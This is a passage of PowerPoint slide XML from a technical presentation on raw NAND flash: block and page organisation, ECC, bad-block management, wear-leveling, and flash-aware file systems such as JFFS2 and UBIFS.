              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad-block management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5634114-70D1-47EB-B4FF-C964A198C467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10131781"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FDDDE93-0514-4CC9-A2D6-CEA9A9335BC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10380785"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4984BBE-865D-4F4D-86F7-FF61DF4F8504}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10614380"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D0BEAAB-4BF1-473F-95BA-92ADF293AD4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10850685"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A3A20BAE-2167-4FA4-95C0-44BAC6154EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11107564"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8EA3869-37C5-4A4D-B86F-D4FBE8DD7DDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11350218" y="2798539"/>
            <a:ext cx="0" cy="1480853"/>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Arrow: Up-Down 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0249D8-D85E-4E78-8412-D5DBE2A60656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9480609" y="2798539"/>
            <a:ext cx="431773" cy="1480853"/>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8x/16x</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Grafik 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF8F3DB-87F4-40FA-9138-625372F9DBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435480" y="1424838"/>
            <a:ext cx="2418257" cy="746205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Grafik 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCE4E1E5-5142-4ACF-920B-8F4568A6EB10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6985899" y="2418761"/>
            <a:ext cx="1447800" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2489D3-E6AB-F745-B1D0-D8F34444CC4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3434569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02FB2C-B950-408C-9279-B07419B28611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="173672"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Raw NAND flash properties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C9A8DC-5BC1-48D0-AF52-6B6CFFB8901B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182667" y="1641766"/>
            <a:ext cx="11413588" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Organized in blocks and pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Pages are continued in blocks which are larger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To erase data, a whole block needs to be erased</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Erasing sets all bits to 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typical block sizes: 16-512 Kbytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Programming works on page level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OOB: management + ECC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flash contains spare blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ECC is computed by host controller or OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sometimes vendor specific computation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43954C6A-6244-430C-90DD-690FD98FF94E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6683316" y="3103418"/>
            <a:ext cx="5508683" cy="3022746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FF31280-9263-AB49-B8EF-825C8DDBCB4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15306769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6F39931-C79D-4BC6-AC6D-4A015D716DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9040286" y="1960425"/>
            <a:ext cx="2947852" cy="31481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DE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BAFF36F-D47D-4E10-9CEF-DC4B8B80285D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025144" y="46968"/>
            <a:ext cx="10972800" cy="868959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wear-leveling for NAND raw flash</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" b="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4837B89-F6DE-44E2-9659-555C2343C38E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194056" y="2012951"/>
            <a:ext cx="8647611" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Individual flash cell has limited writes but:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File-systems like Ext2/3/4 are not wear-leveling aware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Many writes can destroy the flash or corrupt the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Flash aware file-systems or additional layer of management:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>File-System (on partition level only): YAFFS, JFFS/JFFS2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Additional layer (on device level): UBI+UBIFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Must support of bad-block management and wear leveling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deleted blocks are not erased, but only marked as such</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The changed information is copied into a new block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Garbage collector may clean up erased blocks if needed</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="20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D28CCAD-EE6F-4BF2-88BA-FF1EAE3F025E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193412" y="5393777"/>
            <a:ext cx="2665984" cy="5435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NAND flash</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A26CAC-03AF-4803-9E7F-7FEB25799F10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193412" y="4433974"/>
            <a:ext cx="2665984" cy="5435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NAND Hardware interface</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle: Rounded Corners 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68838C5-2E06-4AEA-A904-EB395B867DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193412" y="3692763"/>
            <a:ext cx="2665984" cy="54356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NAND driver (MTD)</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle: Rounded Corners 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8129ACB7-5F6F-4EC0-BFFA-5CD8C260E663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193412" y="2966639"/>
            <a:ext cx="1280160" cy="5435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Char Device</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle: Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF694349-8BFC-409D-B809-6CB258F1AAD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10579236" y="2966640"/>
            <a:ext cx="1280160" cy="5435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Block Device</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle: Rounded Corners 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12491CBA-D247-4995-9521-819181BCA487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193412" y="2484688"/>
            <a:ext cx="1280160" cy="2993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UBI</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle: Rounded Corners 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6293FB3-22CB-41CD-8C15-D73BD4AEBAF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10579236" y="2068446"/>
            <a:ext cx="1280160" cy="7156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JFFS2</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle: Rounded Corners 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19C40AF3-E409-4DE8-97D4-6D5353DFB716}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9193412" y="2068446"/>
            <a:ext cx="1280160" cy="4162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UBIFS</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B658F52A-75D2-4979-B1BC-F4B0BC6DAE6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10526404" y="4977535"/>
            <a:ext cx="0" cy="4162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E9A1A2-8AB4-4516-95BA-9D3B981A9FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10526404" y="4236324"/>
            <a:ext cx="0" cy="1976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36FDA0-2692-4C6A-BF48-D227462DC71E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9833492" y="3510200"/>
            <a:ext cx="0" cy="182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469D15-259D-4098-8CAB-DCA079BA2B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11219316" y="3510201"/>
            <a:ext cx="0" cy="1825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4AA55B-C84C-43F8-8931-9D0A0C4085CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9833492" y="2784076"/>
            <a:ext cx="0" cy="182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DD4590-1F5A-499F-9E0E-A397C8F76A98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11219316" y="2784077"/>
            <a:ext cx="0" cy="182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2E357B2-B272-E149-BCFE-AEFCDC30D5C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1F14E6C3-C42C-476C-912E-AE6D6F1FF526}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3628751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C33D7C0-B304-49AB-A16D-0752222E74DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7223266" y="5240629"/>
            <a:ext cx="1591241" cy="135462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b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data still present</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" dirty="0"/>
          </a:p>
